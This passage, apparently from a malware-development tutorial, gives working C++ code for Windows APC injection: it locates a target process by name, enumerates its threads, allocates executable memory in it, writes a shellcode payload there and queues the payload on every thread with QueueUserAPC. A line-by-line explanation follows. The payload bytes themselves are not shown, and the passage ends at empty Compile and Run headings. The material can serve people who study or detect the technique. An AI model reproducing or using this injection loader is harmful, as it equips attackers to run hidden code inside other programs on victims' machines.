	// initializing size: needed for using Process32First
	pe.dwSize = sizeof(PROCESSENTRY32);
	
	// info about first process encountered in a system snapshot
	hResult = Process32First(hSnapshot, &pe);
	
	// retrieve information about the processes
	// and exit if unsuccessful
	while (hResult) {
		// if we find the process: return process ID
		if (strcmp(procname, pe.szExeFile) == 0) {
			pid = pe.th32ProcessID;
			break;
		}
		hResult = Process32Next(hSnapshot, &pe);
	}
	
	// closes an open handle (CreateToolhelp32Snapshot)
	CloseHandle(hSnapshot);
	return pid;
}

Refer to the Tricks section for an explanation of this part of the code.


DWORD getTids(DWORD pid, std::vector<DWORD>& tids) {
	HANDLE hSnapshot;
	THREADENTRY32 te;
	te.dwSize = sizeof(THREADENTRY32);
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
	if (Thread32First(hSnapshot, &te)) {
		do {
			if (pid == te.th32OwnerProcessID) {
				tids.push_back(te.th32ThreadID);
			}
		} while (Thread32Next(hSnapshot, &te));
	}
	CloseHandle(hSnapshot);
	return !tids.empty();
}
DWORD getTids(DWORD pid, std::vector<DWORD>& tids)
  • DWORD pid: This is the Process ID (PID) of the target process you’re interested in.
  • std::vector<DWORD>& tids: This is a reference to a vector, where the function will store all the Thread IDs (TIDs) belonging to the process.
  • The function returns a non-zero (true) value if it finds at least one thread for the given PID, or zero (false) if not.

HANDLE hSnapshot;
THREADENTRY32 te;
te.dwSize = sizeof(THREADENTRY32);
  • hSnapshot: This is a handle to a snapshot of all threads in the system.
  • THREADENTRY32 te: This structure will hold information about each thread.
  • te.dwSize = sizeof(THREADENTRY32); is required before calling Thread32First() or Thread32Next() to tell the system the size of the structure.

hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
  • This takes a snapshot of all threads currently running in the system.
  • TH32CS_SNAPTHREAD is the flag used to say: “I want a snapshot of threads.”

if (Thread32First(hSnapshot, &te)) {
    do {
        if (pid == te.th32OwnerProcessID) {
            tids.push_back(te.th32ThreadID);
        }
    } while (Thread32Next(hSnapshot, &te));
}
  • Thread32First() gets info about the first thread.
  • The loop (do { ... } while (...)) keeps going through all threads in the system.
    Inside the loop:
  • if (pid == te.th32OwnerProcessID) checks if this thread belongs to the process we care about (matches PID).
  • If yes, it adds the thread ID to the tids vector.

CloseHandle(hSnapshot);
  • Closes the snapshot handle to free system resources.

return !tids.empty();
  • If tids is not empty, that means we found at least one thread so return true (non-zero).
  • If tids is empty, return false (0).

int main(int argc, char* argv[]) {
	DWORD pid = 0; // process ID
	HANDLE ph; // process handle
	HANDLE ht; // thread handle
	LPVOID rb; // remote buffer
	std::vector<DWORD> tids; // thread IDs
	pid = findMyProc(argv[1]);
	if (pid == 0) {
		printf("PID not found :( exiting...\n");
		return -1;
	} else {
		printf("PID = %d\n", pid);
		ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
		if (ph == NULL) {
			printf("OpenProcess failed! exiting...\n");
			return -2;
		}
		
	// allocate memory buffer for remote process
	rb = VirtualAllocEx(ph, NULL, my_payload_len, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		
	// write payload to memory buffer
	WriteProcessMemory(ph, rb, my_payload, my_payload_len, NULL);
	if (getTids(pid, tids)) {
		for (DWORD tid : tids) { 
			HANDLE ht = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
			if (ht) {
				QueueUserAPC((PAPCFUNC)rb, ht, 0);
				printf("payload injected via QueueUserAPC\n");
				CloseHandle(ht);
			}
		}
	}
	CloseHandle(ph);
}
int main(int argc, char* argv[]) {
  • Entry point of the program. Takes command-line arguments (e.g., target.exe).
DWORD pid = 0; // process ID
HANDLE ph;     // process handle
HANDLE ht;     // thread handle
LPVOID rb;     // remote buffer (where shellcode is injected)
std::vector<DWORD> tids; // will store all thread IDs of the target process
  • These are variables to store:
    • The process ID (pid)
    • Handles to the process and threads
    • A pointer to memory in the remote process
    • A list of thread IDs (tids)

pid = findMyProc(argv[1]);
  • Calls a function findMyProc() which takes the process name (like notepad.exe) and returns its Process ID (PID).

if (pid == 0) {
    printf("PID not found :( exiting...\n");
    return -1;
}
  • If no PID is found, print an error and exit with code -1.

else {
    printf("PID = %d\n", pid);
  • Print the found PID.

    ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
    if (ph == NULL) {
        printf("OpenProcess failed! exiting...\n");
        return -2;
    }
  • Open the target process with all permissions.
  • If that fails (e.g., access denied), print error and exit.

    rb = VirtualAllocEx(ph, NULL,
        my_payload_len,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);
  • Allocates a memory buffer inside the target process, with read/write/execute permissions.
  • my_payload_len is the size of the shellcode.
  • rb holds the address of the allocated memory.

    WriteProcessMemory(ph, rb,
        my_payload,
        my_payload_len, NULL);
  • Writes the malicious payload (probably calc.exe shellcode) into the allocated memory of the remote process.

    if (getTids(pid, tids)) {
        for (DWORD tid : tids) {
            HANDLE ht = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
            if (ht) {
                QueueUserAPC((PAPCFUNC)rb, ht, 0);
                printf("payload injected via QueueUserAPC\n");
                CloseHandle(ht);
            }
        }
    }
  • Calls a function getTids() to get all thread IDs from that process.
  • Loops through each thread ID:
    • Opens the thread with permission to set context.
    • Injects the payload using QueueUserAPC().
      • This schedules the shellcode to be executed when the thread enters an alertable state (e.g., waits on SleepEx() or WaitForSingleObjectEx()).
    • Closes the thread handle afterward.

    CloseHandle(ph);
}
return 0;
  • Closes the handle to the process and exits normally.

Compile

Run